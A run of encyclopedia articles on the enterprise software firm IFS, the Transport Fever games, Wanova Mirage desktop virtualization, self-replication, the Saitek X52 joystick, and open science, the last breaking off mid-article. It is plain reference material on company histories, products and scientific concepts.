IFS AB (Industrial and Financial Systems) is a multinational enterprise software company headquartered in Linköping, Sweden. The company develops and delivers enterprise software for customers around the world who manufacture and distribute goods, maintain assets, and manage service-focused operations. IFS has over 4,000 employees that support more than 10,000 customers worldwide from a network of local offices and a growing ecosystem of partners. History Early years (1983-1996) IFS was founded in 1983 in Sweden and launched its first software product IFS Maintenance in 1985. Five years later the complete product suite known as IFS Applications was launched. In the next several years saw IFS expanding its presence in the Scandinavian region with establishment of offices in Norway, Finland, Denmark and then expanding outside Scandinavia into Poland. 1993, saw IFS introducing its first graphical user interface and expanding to Malaysia. In 1995, it expanded to North America. Expansions (1996-2015) In 1996, IFS was listed in the Swedish stock exchange and the product was made into a component based one. This was followed with the launch of its web client and its establishment of an RnD center in Colombo. 2001 saw IFS introducing mobile clients and Java based internet portals. In 2004, NEC acquired a 7.7% of IFS share capital. By 2005, IFS Applications had more than 500,000 users. 2008 saw IFS launching its new GUI and the start of several acquisitions. Investment by EQT (2015- ) In 2015, IFS had reached more than one million global users and was acquired by EQT, a Swedish private equity group. IFS released its most recent ERP system, IFS Applications 10, in 2018 – the same year that Darren Roos was appointed as CEO, followed by IFS Field Service Management 6 in 2019. As of September 2020, private equity firm TA Associates bought in to IFS with a significant minority stake. Operations IFS is governed by the company’s Executive Management Team, providing leadership and direction from a global, operational perspective. Strategically, the company has a four region focus, led by members of the Executive Management Team. These focus areas are; Southern & Western Europe, Northern & Central Europe, Americas and APJME&A. Acquisitions Philanthropy In 2015, IFS initiated the IFS Education Programme, focusing on inspiring more students to study beyond elementary school and to highlight the importance of STEM subjects. Partnerships with schools were based around lectures and teaching by IFS staff, donation of computer equipment, financial support through scholarships and grants, and free IFS software. In 2018, over 90 universities were part of the IFS Education Programme. IFS offers its employees one CSR day per year to use to volunteer in their local communities. In 2019, IFS employees volunteered 4624 hours of their time. Having been present in Sri Lanka for over 20 years, The IFS Foundation was created by IFS employees to give back to rural villages in Sri Lanka by improving living conditions. The trustees of the IFS Foundation have indicated that they plan to address healthcare, sanitation, education, access to clean water, and rural poverty. Key projects in 2019 focused on the provision of sanitation facilities, tube wells, and improvements to the local school. Accolades In the recent past IFS has gained several accolades in multiple categories across business, technology, HR and culture. IFS was selected winner of the European Digital Technology Award, out of 150,000 businesses from over 33 countries, in the last year’s European Business Awards 2019. In 2020, its CEO Darren Roos was awarded the ‘CEO of the Year 2020’ and IFS won bronze in the Transform Awards 2020. IFS received a 5-Star rating from CRN®, a brand of The Channel Company, in its 2020 Partner Program Guide. The company has been recognized for several Great Places to Work recognitions (2018, 2017,2016) as well as receiving praise for multiple CSR initiatives including receiving the CSR Excellence Award for the IFS Education program alongside the CSR Award, both in 2019. See also List of ERP software packages Notes References Swedish brands ERP software companies CRM software companies Companies established in 1983 Software companies of Sweden Software companies of Sri Lanka
55480194
https://en.wikipedia.org/wiki/Transport%20Fever
Transport Fever
Transport Fever is a business video game series developed by Urban Games and published by Gambitious Digital Entertainment. The franchise was introduced in 2014, when the first game titled as Train Fever, with the latest game titled as Transport Fever 2 was released in 2019. Games Train Fever (2014) The first video game of the series was initially released on 4 September 2014 for Microsoft Windows, macOS, Linux. Transport Fever (2016) A sequel, titled Transport Fever was announced in April 2016. It was available worldwide for Microsoft Windows on 8 November 2016. Transport Fever 2 (2019) Transport Fever 2 was initially available for Microsoft Windows and Linux via Steam on 11 December 2019. Urban Games remained to develop the game, with Good Shepherd Entertainment, which rebranded from Gambitious Digital Entertainment published the game. A macOS version released in autumn 2020. References External links Business simulation games Linux games Transport simulation games Video game franchises introduced in 2014
28322865
https://en.wikipedia.org/wiki/Wanova
Wanova
Wanova, Inc, headquartered in San Jose, California, provides software to help IT organizations manage, support and protect data on desktop and laptop computers. Wanova's primary product, Wanova Mirage, was designed as an alternative to server-hosted desktop virtualization technologies. History Wanova was founded in January 2008 by Ilan Kessler and Issy Ben-Shaul, previously co-founders of Actona Technologies, which was acquired by Cisco in 2004 and became the foundation for Cisco Wide Area Application Services (WAAS). The company received its first round of funding from Greylock Partners, Carmel Ventures and Opus Capital in the sum of $13 million. As of May 22, 2012 Issy Ben-Shaul announced on Wanova Blog that Wanova has become a part of VMware. Products As of February 2011, there is one primary product, Wanova Mirage hybrid desktop virtualization software, which has three components: Wanova Mirage Client, Wanova Mirage Server, and Wanova Network Optimization. The Mirage Client is a small MSI that installs on the PC of an end user, and allows the endpoint to become managed by the Mirage Server. The Mirage Server provides tools for creating, managing and deploying a Base Image, which typically consists of an Operating System (OS) and core applications that an administrator wants to manage centrally, such as Microsoft Office or Antivirus. Mirage Server also manages the backup and restore synchronization process. Distributed Desktop Optimization incorporates capabilities such as deduplication and compression that make the product effective over a low bandwidth, high-latency WAN. Once Mirage is installed, IT administrators maintain a complete, bootable desktop instance in the data center. This instance is hardware agnostic, and can be instantiated on both physical hardware or in a virtual machine. No hypervisor is required when the instance is deployed into PC hardware. How VMware Mirage Works Mirage logically splits the PC into individual layers that can be independently managed: a Base Image; a layer including user-installed applications and machine information, such as machine ID; and a layer including user data, files and personalization. In this manner, IT can create a single read-only Base Image, typically including an operating system (OS) and the core applications they will manage centrally, such as Microsoft Office and an antivirus solution. This Base Image can be deployed to the locally stored copy of each PC, and then synchronized as a whole with the endpoint. Because of the layering, the Image can be patched, updated, and re-synchronized as needed, without overwriting the user-installed applications or data. These features, combined with the network optimizations, create a number of use cases: Single Image Management – IT can manage one primary image and synchronize it with thousands of endpoints Hardware Migration – By replacing the Base Image associated with an end user's PC, the user's desktop, including applications, data, and personalization settings, can be migrated to new hardware, including hardware from a different manufacturer. This process can be used as part of a regular hardware migration process, or to quickly replace a lost, stolen or broken PC. Remote repair of a damaged application – By ‘Enforcing’ a Base Image, IT can ensure a remote device exactly matches the primary copy in the data center, and repairing OS or core application problems. In place migration from Windows XP to Windows 7 - By replacing the Base Image associated with an end user's PC, the user's desktop, including data and personalization settings, can be migrated from Windows XP to Windows 7, over the network and without added infrastructure. Differences between VMware Mirage and Virtual Desktop Infrastructure (VDI) Virtual Desktop Infrastructure, or VDI, was initially branded by VMware. The term VDI has enjoyed broader usage, however, and has come to be known as a synonym for server-hosted desktop virtualization, or Hosted Virtual Desktops (Gartner). A typical VDI architecture replaces end users desktops by deploying each desktop on a virtual machine, running on a server in the data center. Users access a view of their desktop via a thin client or other access device, using a vendor-specific protocol. VMware Mirage differs fundamentally from this type of architecture in the following ways: No hypervisor required: While Mirage can operate within a Type-1 or Type-2 hypervisor, it is not required. The VMware Mirage client operates as a service within the Windows Operating System (OS). Scalability: Because VDI uses centralized servers to handle all processing functions for each desktop, a typical server can support roughly 10-12 users, depending on load. Mirage uses the endpoints for processing, and can consequently scale to a 1500:1 desktop to server ratio. Deployment: In most environments, Mirage deployment leverages components an organization already has in place: endpoint PCs, a server, and back-end storage. End users do not change their workflow, Network optimizations: Mirage leverages a global single index that enables significant deduplication across all users, reducing network traffic and storage requirements. Storage: Because VDI users require synchronous network access to their centralized desktop, performance can be significantly impacted by the type of back end storage. Because Mirage clients run a local instance of the centrally stored desktop, storage is only accessed when synchronization is required. Secondary storage, including lower cost SATA drives, are adequate. Known limitations The software is currently compatible only with Windows OS. There is no native offering for other operating systems such as Linux or Mac OS-X. The software may still be used inside virtual machines running a supported Windows OS on such platforms. See also Desktop virtualization Virtual Desktop Infrastructure References External links Wanova is Part of VMware Wanova Blog. May 22, 2012 Wanova Mirage 2.0 managing physical, virtual and cloud Windows desktops ZDNet. February 3, 2011 Wanova Makes Mirage Virtual Desktop Solution Enterprise-Ready eWeek. January 25, 2011 TechTarget’s SearchServerVirtualization.com Announces “Best of VMworld” 2010 Award Winners BusinessWire. September 2, 2010 Wanova Redefines Windows Desktop Management and Provisioning eWeek. August 18, 2010 Desktop Virtualization Aids Windows 7 Migration ITBusinessEdge, September 1, 2010 Products of the Week NetworkWorld. May 17, 2010 Startup Wanova Launches Distributed Desktop Virtualization The VAR Guy. March 16, 2010 Wanova Releases Mirage Desktop Virtualization Software eWeek. March 16, 2010 Four Reasons Why VDI Might Not Be For You Search Virtual Desktop. July 8, 2010 Wanova Home Page Software companies based in the San Francisco Bay Area Virtualization software Software companies established in 2008 Companies based in San Jose, California Software companies of Israel Software companies of the United States
29549
https://en.wikipedia.org/wiki/Self-replication
Self-replication
Self-replication is any behavior of a dynamical system that yields construction of an identical or similar copy of itself. Biological cells, given suitable environments, reproduce by cell division. During cell division, DNA is replicated and can be transmitted to offspring during reproduction. Biological viruses can replicate, but only by commandeering the reproductive machinery of cells through a process of infection. Harmful prion proteins can replicate by converting normal proteins into rogue forms. Computer viruses reproduce using the hardware and software already present on computers. Self-replication in robotics has been an area of research and a subject of interest in science fiction. Any self-replicating mechanism which does not make a perfect copy (mutation) will experience genetic variation and will create variants of itself. These variants will be subject to natural selection, since some will be better at surviving in their current environment than others and will out-breed them. Overview Theory Early research by John von Neumann established that replicators have several parts: A coded representation of the replicator A mechanism to copy the coded representation A mechanism for effecting construction within the host environment of the replicator Exceptions to this pattern may be possible, although none have yet been achieved. For example, scientists have come close to constructing RNA that can be copied in an "environment" that is a solution of RNA monomers and transcriptase. In this case, the body is the genome, and the specialized copy mechanisms are external. The requirement for an outside copy mechanism has not yet been overcome, and such systems are more accurately characterized as "assisted replication" than "self-replication". Nonetheless, in March 2021, researchers reported evidence suggesting that a preliminary form of transfer RNA could have been a replicator molecule itself in the very early development of life, or abiogenesis. However, the simplest possible case is that only a genome exists. Without some specification of the self-reproducing steps, a genome-only system is probably better characterized as something like a crystal. Classes of self-replication Recent research has begun to categorize replicators, often based on the amount of support they require. Natural replicators have all or most of their design from nonhuman sources. Such systems include natural life forms. Autotrophic replicators can reproduce themselves "in the wild". They mine their own materials. It is conjectured that non-biological autotrophic replicators could be designed by humans, and could easily accept specifications for human products. Self-reproductive systems are conjectured systems which would produce copies of themselves from industrial feedstocks such as metal bar and wire. Self-assembling systems assemble copies of themselves from finished, delivered parts. Simple examples of such systems have been demonstrated at the macro scale. The design space for machine replicators is very broad. A comprehensive study to date by Robert Freitas and Ralph Merkle has identified 137 design dimensions grouped into a dozen separate categories, including: (1) Replication Control, (2) Replication Information, (3) Replication Substrate, (4) Replicator Structure, (5) Passive Parts, (6) Active Subunits, (7) Replicator Energetics, (8) Replicator Kinematics, (9) Replication Process, (10) Replicator Performance, (11) Product Structure, and (12) Evolvability. A self-replicating computer program In computer science a quine is a self-reproducing computer program that, when executed, outputs its own code. For example, a quine in the Python programming language is: A more trivial approach is to write a program that will make a copy of any stream of data that it is directed to, and then direct it at itself. In this case the program is treated as both executable code, and as data to be manipulated. This approach is common in most self-replicating systems, including biological life, and is simpler as it does not require the program to contain a complete description of itself. In many programming languages an empty program is legal, and executes without producing errors or other output. The output is thus the same as the source code, so the program is trivially self-reproducing. Self-replicating tiling In geometry a self-replicating tiling is a tiling pattern in which several congruent tiles may be joined together to form a larger tile that is similar to the original. This is an aspect of the field of study known as tessellation. The "sphinx" hexiamond is the only known self-replicating pentagon. For example, four such concave pentagons can be joined together to make one with twice the dimensions. Solomon W. Golomb coined the term rep-tiles for self-replicating tilings. In 2012, Lee Sallows identified rep-tiles as a special instance of a self-tiling tile set or setiset. A setiset of order n is a set of n shapes that can be assembled in n different ways so as to form larger replicas of themselves. Setisets in which every shape is distinct are called 'perfect'. A rep-n rep-tile is just a setiset composed of n identical pieces. Self replicating clay crystals One form of natural self-replication that isn't based on DNA or RNA occurs in clay crystals. Clay consists of a large number of small crystals, and clay is an environment that promotes crystal growth. Crystals consist of a regular lattice of atoms and are able to grow if e.g. placed in a water solution containing the crystal components; automatically arranging atoms at the crystal boundary into the crystalline form. Crystals may have irregularities where the regular atomic structure is broken, and when crystals grow, these irregularities may propagate, creating a form of self-replication of crystal irregularities. Because these irregularities may affect the probability of a crystal breaking apart to form new crystals, crystals with such irregularities could even be considered to undergo evolutionary development. Applications It is a long-term goal of some engineering sciences to achieve a clanking replicator, a material device that can self-replicate. The usual reason is to achieve a low cost per item while retaining the utility of a manufactured good. Many authorities say that in the limit, the cost of self-replicating items should approach the cost-per-weight of wood or other biological substances, because self-replication avoids the costs of labor, capital and distribution in conventional manufactured goods. A fully novel artificial replicator is a reasonable near-term goal. A NASA study recently placed the complexity of a clanking replicator at approximately that of Intel's Pentium 4 CPU. That is, the technology is achievable with a relatively small engineering group in a reasonable commercial time-scale at a reasonable cost. Given the currently keen interest in biotechnology and the high levels of funding in that field, attempts to exploit the replicative ability of existing cells are timely, and may easily lead to significant insights and advances. A variation of self replication is of practical relevance in compiler construction, where a similar bootstrapping problem occurs as in natural self replication. A compiler (phenotype) can be applied on the compiler's own source code (genotype) producing the compiler itself. During compiler development, a modified (mutated) source is used to create the next generation of the compiler. This process differs from natural self-replication in that the process is directed by an engineer, not by the subject itself. Mechanical self-replication An activity in the field of robots is the self-replication of machines. Since all robots (at least in modern times) have a fair number of the same features, a self-replicating robot (or possibly a hive of robots) would need to do the following: Obtain construction materials Manufacture new parts including its smallest parts and thinking apparatus Provide a consistent power source Program the new members error correct any mistakes in the offspring On a nano scale, assemblers might also be designed to self-replicate under their own power. This, in turn, has given rise to the "grey goo" version of Armageddon, as featured in the science fiction novels Bloom and Prey. The Foresight Institute has published guidelines for researchers in mechanical self-replication. The guidelines recommend that researchers use several specific techniques for preventing mechanical replicators from getting out of control, such as using a broadcast architecture. For a detailed article on mechanical reproduction as it relates to the industrial age see mass production. Fields Research has occurred in the following areas: Biology: studies of organismal and cellular natural replication and replicators, and their interaction, including sub-disciplines such as population dynamics, quorum sensing, autophagy pathways. These can be an important guide to avoid design difficulties in self-replicating machinery. Chemistry: self-replication studies are typically about how a specific set of molecules can act together to replicate each other within the set (often part of Systems chemistry field). Biochemistry: simple systems of in vitro ribosomal self replication have been attempted, but as of January 2021, indefinite in vitro ribosomal self replication has not been achieved in the lab. Nanotechnology or more precisely, molecular nanotechnology is concerned with making nano scale assemblers. Without self-replication, capital and assembly costs of molecular machines become impossibly large. Many bottom-up approaches to nanotechnology take advantage of biochemical or chemical self-assembly. Space resources: NASA has sponsored a number of design studies to develop self-replicating mechanisms to mine space resources. Most of these designs include computer-controlled machinery that copies itself. Memetics: The idea of a meme was coined by Richard Dawkins in his 1976 book The Selfish Gene where he proposed a cognitive equivalent of the gene; a unit of behavior which is copied from one host mind to another through observation. Memes can only propagate via animal behavior and are thus analogous to information viruses and are often described as viral. Computer security: Many computer security problems are caused by self-reproducing computer programs that infect computers — computer worms and computer viruses. Parallel computing: loading a new program on every node of a large computer cluster or distributed computing system is time consuming. Using a mobile agents to self-replicate code from node-to-node can save the system administrator a lot of time. Mobile agents have a potential to crash a computer cluster if poorly implemented. In industry Space exploration and manufacturing The goal of self-replication in space systems is to exploit large amounts of matter with a low launch mass. For example, an autotrophic self-replicating machine could cover a moon or planet with solar cells, and beam the power to the Earth using microwaves. Once in place, the same machinery that built itself could also produce raw materials or manufactured objects, including transportation systems to ship the products. Another model of self-replicating machine would copy itself through the galaxy and universe, sending information back. In general, since these systems are autotrophic, they are the most difficult and complex known replicators. They are also thought to be the most hazardous, because they do not require any inputs from human beings in order to reproduce. A classic theoretical study of replicators in space is the 1980 NASA study of autotrophic clanking replicators, edited by Robert Freitas. Much of the design study was concerned with a simple, flexible chemical system for processing lunar regolith, and the differences between the ratio of elements needed by the replicator, and the ratios available in regolith. The limiting element was Chlorine, an essential element to process regolith for Aluminium. Chlorine is very rare in lunar regolith, and a substantially faster rate of reproduction could be assured by importing modest amounts. The reference design specified small computer-controlled electric carts running on rails. Each cart could have a simple hand or a small bull-dozer shovel, forming a basic robot. Power would be provided by a "canopy" of solar cells supported on pillars. The other machinery could run under the canopy. A "casting robot" would use a robotic arm with a few sculpting tools to make plaster molds. Plaster molds are easy to make, and make precise parts with good surface finishes. The robot would then cast most of the parts either from non-conductive molten rock (basalt) or purified metals. An electric oven melted the materials. A speculative, more complex "chip factory" was specified to produce the computer and electronic systems, but the designers also said that it might prove practical to ship the chips from Earth as if they were "vitamins". Molecular manufacturing Nanotechnologists in particular believe that their work will likely fail to reach a state of maturity until human beings design a self-replicating assembler of nanometer dimensions . These systems are substantially simpler than autotrophic systems, because they are provided with purified feedstocks and energy. They do not have to reproduce them. This distinction is at the root of some of the controversy about whether molecular manufacturing is possible or not. Many authorities who find it impossible are clearly citing sources for complex autotrophic self-replicating systems. Many of the authorities who find it possible are clearly citing sources for much simpler self-assembling systems, which have been demonstrated. In the meantime, a Lego-built autonomous robot able to follow a pre-set track and assemble an exact copy of itself, starting from four externally provided components, was demonstrated experimentally in 2003 . Merely exploiting the replicative abilities of existing cells is insufficient, because of limitations in the process of protein biosynthesis (also see the listing for RNA). What is required is the rational design of an entirely novel replicator with a much wider range of synthesis capabilities. In 2011, New York University scientists have developed artificial structures that can self-replicate, a process that has the potential to yield new types of materials. They have demonstrated that it is possible to replicate not just molecules like cellular DNA or RNA, but discrete structures that could in principle assume many different shapes, have many different functional features, and be associated with many different types of chemical species. For a discussion of other chemical bases for hypothetical self-replicating systems, see alternative biochemistry. See also Artificial life Astrochicken Autopoiesis Complex system DNA replication Life Robot RepRap (self-replicated 3D printer) Self-replicating machine Self-replicating spacecraft Space manufacturing Von Neumann universal constructor Virus Von Neumann machine (disambiguation) Self reconfigurable Final Anthropic Principle Positive feedback Harmonic References Notes von Neumann, J., 1966, The Theory of Self-reproducing Automata, A. Burks, ed., Univ. of Illinois Press, Urbana, IL. Advanced Automation for Space Missions, a 1980 NASA study edited by Robert Freitas Kinematic Self-Replicating Machines first comprehensive survey of entire field in 2004 by Robert Freitas and Ralph Merkle NASA Institute for Advance Concepts study by General Dynamics- concluded that complexity of the development was equal to that of a Pentium 4, and promoted a design based on cellular automata. Gödel, Escher, Bach by Douglas Hofstadter (detailed discussion and many examples) Kenyon, R., Self-replicating tilings, in: Symbolic Dynamics and Applications (P. Walters, ed.) Contemporary Math. vol. 135 (1992), 239-264.
6708375
https://en.wikipedia.org/wiki/Saitek%20X52
Saitek X52
The Saitek X52 is an advanced HOTAS Joystick/Throttle combination from Saitek released in 2004. Features The X52 was one of Saitek's flagship products and features both a Joystick and a Throttle. The distinguishing feature of the X52 is the large backlit blue (or green, on an X52 Pro) LCD display on the throttle, which displays the mode it is configured, the name of the button being depressed and a chronograph function. The Multi-Function Display (MFD) screen can be used to check programmed command names and use the clock and stopwatch function for timing the legs of your flight plan. The joystick/throttle combination includes a number of controls, including trim wheels, a thumb operated slider, a mouse control and three eight-way hat switches, and a button under a flip-guard labeled "Safe". The stick includes built in yaw/rudder control, which can be disabled in the case that the user has an alternate rudder control. The stick/throttle combination are designed to function as a HOTAS system. This means that games can be played without the player ever taking their hands off the controls to use a keyboard or mouse. The X52 uses only a single spring mounted vertically to keep it centered, while the X52 Pro uses dual springs for stronger centering. This enables quick direction changes on the stick without "clicking" through the axes - a problem common to other sticks which normally feature two springs mounted horizontally. The X52 also features an integrated mouse on the throttle, however it is difficult to use for making quick selections and only functions when drivers and the SST software are installed. Featuring 23 buttons, three 8-way hat switches and 7 control axes, the X52 gives you 47 basic commands plus the control axes. But when you include the programming options provided by powerful Saitek Smart Technology programming software, which allows you to make use of the 3 position mode switch and Pinkie shift switch, the total number of programmable commands is 282. Programming Software The Smart Technology (ST) programming software is used to program all kinds of behaviors for each command of the HOTAS, even custom ones such as setting not only the Pinkie switch, but just about any button to act as a shift, making it possible, then, to have multiple shift buttons configured per game Profile, which raise the total number of programmable commands far above the canon limit of 282. The software allows gamers to configure their controls to suit their preferred gaming style and to save the configurations as personal game Profiles, which can be selected and applied on-the-fly at any time through the HOTAS itself (the MFD will list the available Profile names). The use of multiple game Profiles prepared for each game raises the amount of programmable functions per game to a virtually unlimited amount. Support Since the acquisition of Saitek in September 2016, Logitech has been providing both Driver and ST programming software support for the X52 and X52 Pro HOTAS devices. Over the years, users have reported issues and stability problems regarding the use of [Logitech's] ST programming software. The old drivers and ST programming software from Saitek are still available at ftp.saitek.com (freely accessible through most ftp clients) and that they still work properly today on modern Operating Systems, such as Windows 10. Should the user of Logitech's driver/ST programming software decide to revert back to the Saitek's counterparts, a complete removal of the Logitech drivers/ST programming software plus all related X52 peripherals installed in the System would be mandatory, lest the Saitek version of the ST programming software would fail to recognize and communicate with the HOTAS on account of different Hardware IDs set by the new driver from Logitech. To successfully use the ST programming software from Saitek is necessary to also use the companion driver from Saitek. Joystick Precision centering mechanism, non-contact technology on X and Y axes and constant spring force reduce free play, improve control and increase durability. 2-stage metal trigger; 2 primary buttons in 1 convenient position 4 fire buttons including missile launcher with spring-loaded safety cover for instant access Conveniently positioned metal pinkie switch provides shift functionality to double up on programmable commands 2 X 8-way Hat Switches 3D rudder twist 3-position rotary mode selector switch with LED indicators 3 spring-loaded, base-mounted toggle switches for up to 6 programmable flight commands 5-position handle adjustment system to suit all hand sizes Throttle Progressive throttle with tension adjustment, and 2 detents for afterburner and idle (set at 90% and 10% respectively) 2 fire buttons Scroll wheel with built-in button Mouse controller / hat switch with left mouse button 8-way hat switch 2 x rotary controls Smooth-action slider control Clutch button initiates ‘safe mode’ to allow on-the-fly Profile selection, or to display button functionality without activating References External links Saitek.com Home computer peripherals Video game controllers
6277878
https://en.wikipedia.org/wiki/Open%20science
Open science
Open science is the movement to make scientific research (including publications, data, physical samples, and software) and its dissemination accessible to all levels of society, amateur or professional. Open science is transparent and accessible knowledge that is shared and developed through collaborative networks. It encompasses practices such as publishing open research, campaigning for open access, encouraging scientists to practice open-notebook science, broader dissemination and engagement in science and generally making it easier to publish, access and communicate scientific knowledge. Usage of the term varies substantially across disciplines, with a notable prevalence in the STEM disciplines. Open research is often used quasi-synonymously to address the gap that the denotion of "science" might have regarding an inclusion of the Arts, Humanities and Social Sciences. The primary focus connecting all disciplines is the widespread uptake of new technologies and tools, and the underlying ecology of the production, dissemination and reception of knowledge from a research-based point-of-view. As Tennant et al. (2020) note, the term open science "implicitly seems only to regard ‘scientific’ disciplines, whereas open scholarship can be considered to include research from the Arts and Humanities (Eve 2014; Knöchelmann 2019), as well as the different roles and practices that researchers perform as educators and communicators, and an underlying open philosophy of sharing knowledge beyond research communities." Open science can be seen as a continuation of, rather than a revolution in, practices begun in the 17th century with the advent of the academic journal, when the societal demand for access to scientific knowledge reached a point at which it became necessary for groups of scientists to share resources with each other. In modern times there is debate about the extent to which scientific information should be shared. The conflict that led to the Open Science movement is between the desire of scientists to have access to shared resources versus the desire of individual entities to profit when other entities partake of their resources. Additionally, the status of open access and resources that are available for its promotion are likely to differ from one field of academic inquiry to another. Principles The six principles of open science are: Open methodology Open source Open data Open access Open peer review Open educational resources Background Science is broadly understood as collecting, analyzing, publishing, reanalyzing, critiquing, and reusing data. Proponents of open science identify a number of barriers that impede or dissuade the broad dissemination of scientific data. These include financial paywalls of for-profit research publishers, restrictions on usage applied by publishers of data, poor formatting of data or use of proprietary software that makes it difficult to re-purpose, and cultural reluctance to publish data for fears of losing control of how the information is used. According to the FOSTER taxonomy Open science can often include aspects of Open access, Open data and the open source movement whereby modern science requires software to process data and information. Open research computation also addresses the problem of reproducibility of scientific results. Types The term "open science" does not have any one fixed definition or operationalization. On the one hand, it has been referred to as a "puzzling phenomenon". On the other hand, the term has been used to encapsulate a series of principles that aim to foster scientific growth and its complementary access to the public. Two influential sociologists, Benedikt Fecher and Sascha Friesike, have created multiple "schools of thought" that describe the different interpretations of the term. According to Fecher and Friesike ‘Open Science’ is an umbrella term for various assumptions about the development and dissemination of knowledge. To show the term's multitudinous perceptions, they differentiate between five Open Science schools of thought: Infrastructure School The infrastructure school is founded on the assumption that "efficient" research depends on the availability of tools and applications. Therefore, the "goal" of the school is to promote the creation of openly available platforms, tools, and services for scientists. Hence, the infrastructure school is concerned with the technical infrastructure that promotes the development of emerging and developing research practices through the use of the internet, including the use of software and applications, in addition to conventional computing networks. In that sense, the infrastructure school regards open science as a technological challenge. The infrastructure school is tied closely with the notion of "cyberscience", which describes the trend of applying information and communication technologies to scientific research, which has led to an amicable development of the infrastructure school. Specific elements of this prosperity include increasing collaboration and interaction between scientists, as well as the development of "open-source science" practices. The sociologists discuss two central trends in the infrastructure school: 1. Distributed computing: This trend encapsulates practices that outsource complex, process-heavy scientific computing to a network of volunteer computers around the world. The examples that the sociologists cite in their paper is that of the Open Science Grid, which enables the development of large-scale projects that require high-volume data management and processing, which is accomplished through a distributed computer network. Moreover, the grid provides the necessary tools that the scientists can use to facilitate this process. 2. Social and Collaboration Networks of Scientists: This trend encapsulates the development of software that makes interaction with other researchers and scientific collaborations much easier than traditional, non-digital practices. Specifically, the trend is focused on implementing newer Web 2.0 tools to facilitate research related activities on the internet. De Roure and colleagues (2008) list a series of four key capabilities which they believe define a Social Virtual Research Environment (SVRE): The SVRE should primarily aid the management and sharing of research objects. The authors define these to be a variety of digital commodities that are used repeatedly by researchers. Second, the SVRE should have inbuilt incentives for researchers to make their research objects available on the online platform. Third, the SVRE should be "open" as well as "extensible", implying that different types of digital artifacts composing the SVRE can be easily integrated. Fourth, the authors propose that the SVRE is more than a simple storage tool for research information. Instead, the researchers propose that the platform should be "actionable". That is, the platform should be built in such a way that research objects can be used in the conduct of research as opposed to simply being stored. Measurement school The measurement school, in the view of the authors, deals with developing alternative methods to determine scientific impact. This school acknowledges that measurements of scientific impact are crucial to a researcher's reputation, funding opportunities, and career development. Hence, the authors argue, that any discourse about Open Science is pivoted around developing a robust measure of scientific impact in the digital age. The authors then discuss other research indicating support for the measurement school. The three key currents of previous literature discussed by the authors are: The peer-review is described as being time-consuming. The impact of an article, tied to the name of the authors of the article, is related more to the circulation of the journal rather than the overall quality of the article itself. New publishing formats that are closely aligned with the philosophy of Open Science are rarely found in the format of a journal that allows for the assignment of the impact factor. Hence, this school argues that there are faster impact measurement technologies that can account for a range of publication types as well as social media web coverage of a scientific contribution to arrive at a complete evaluation of how impactful the science contribution was. The gist of the argument for this school is that hidden uses like reading, bookmarking, sharing, discussing and rating are traceable activities, and these traces can and should be used to develop a newer measure of scientific impact. The umbrella jargon for this new type of impact measurements is called altmetrics, coined in a 2011 article by Priem et al., (2011). Markedly, the authors discuss evidence that altmetrics differ from traditional webometrics which are slow and unstructured. Altmetrics are proposed to rely upon a greater set of measures that account for tweets, blogs, discussions, and bookmarks. The authors claim that the existing literature has often proposed that altmetrics should also encapsulate the scientific process, and measure the process of research and collaboration to create an overall metric. However, the authors are explicit in their assessment that few papers offer methodological details as to how to accomplish this. The authors use this and the general dearth of evidence to conclude that research in the area of altmetrics is still in its infancy. Public School According to the authors, the central concern of the school is to make science accessible to a wider audience. The inherent assumption of this school, as described by the authors, is that the newer communication technologies such as Web 2.0 allow scientists to open up the research process and also allow scientist to better prepare their "products of research" for interested non-experts. Hence, the school is characterized by two broad streams: one argues for the access of the research process to the masses, whereas the other argues for increased access to the scientific product to the public. Accessibility to the Research Process: Communication technology allows not only for the constant documentation of research but also promotes the inclusion of many different external individuals in the process itself. The authors cite citizen science- the participation of non-scientists and amateurs in research. The authors discuss instances in which gaming tools allow scientists to harness the brain power of a volunteer workforce to run through several permutations of protein-folded structures. This allows for scientists to eliminate many more plausible protein structures while also "enriching" the citizens about science. The authors also discuss a common criticism of this approach: the amateur nature of the participants threatens to pervade the scientific rigor of experimentation. Comprehensibility of the Research Result: This stream of research concerns itself with making research understandable for a wider audience. The authors describe a host of authors that promote the use of specific tools for scientific communication, such as microblogging services, to direct users to relevant literature. The authors claim that this school proposes that it is the obligation of every researcher to make their research accessible to the public. The authors then proceed to discuss if there is an emerging market for brokers and mediators of knowledge that is otherwise too complicated for the public to grasp. Democratic school The democratic school concerns itself with the concept of access to knowledge. As opposed to focusing on the accessibility of research and its understandability, advocates of this school focus on the access of products of research to the public. The central concern of the school is with the legal and other obstacles that hinder the access of research publications and scientific data to the public. Proponents assert that any research product should be freely available. and that everyone has the same, equal right of access to knowledge, especially in the instances of state-funded experiments and data. Two central currents characterize this school: Open Access and Open Data. Open Data: Opposition to the notion that publishing journals should claim copyright over experimental data, which prevents the re-use of data and therefore lowers the overall efficiency of science in general. The claim is that journals have no use of the experimental data and that allowing other researchers to use this data will be fruitful. Only a quarter of researchers agree to share their data with other researchers because of the effort required for compliance. Open Access to Research Publication: According to this school, there is a gap between the creation and sharing of knowledge. Proponents argue that even though scientific knowledge doubles every 5 years, access to this knowledge remains limited. These proponents consider access to knowledge as a necessity for human development, especially in the economic sense. Pragmatic School The pragmatic school considers Open Science as the possibility to make knowledge creation and dissemination more efficient by increasing the collaboration throughout the research process. Proponents argue that science could be optimized by modularizing the process and opening up the scientific value chain. ‘Open’ in this sense follows very much the concept of open innovation. Take for instance transfers the outside-in (including external knowledge in the production process) and inside-out (spillovers from the formerly closed production process) principles to science. Web 2.0 is considered a set of helpful tools that can foster collaboration (sometimes also referred to as Science 2.0). Further, citizen science is seen as a form of collaboration that includes knowledge and information from non-scientists. Fecher and Friesike describe data sharing as an example of the pragmatic school as it enables researchers to use other researchers’ data to pursue new research questions or to conduct data-driven replications. History The widespread adoption of the institution of the scientific journal marks the beginning of the modern concept of open science. Before this time societies pressured scientists into secretive behaviors. Before journals Before the advent of scientific journals, scientists had little to gain and much to lose by publicizing scientific discoveries. Many scientists, including Galileo, Kepler, Isaac Newton, Christiaan Huygens, and Robert Hooke, made claim to their discoveries by describing them in papers coded in anagrams or cyphers and then distributing the coded text. Their intent was to develop their discovery into something off which they could profit, then reveal their discovery to prove ownership when they were prepared to make a claim on it. The system of not publicizing discoveries caused problems because discoveries were not shared quickly and because it sometimes was difficult for the discoverer to prove priority. Newton and Gottfried Leibniz both claimed priority in discovering calculus. Newton said that he wrote about calculus in the 1660s and 1670s, but did not publish until 1693. Leibniz published "Nova Methodus pro Maximis et Minimis", a treatise on calculus, in 1684. Debates over priority are inherent in systems where science is not published openly, and 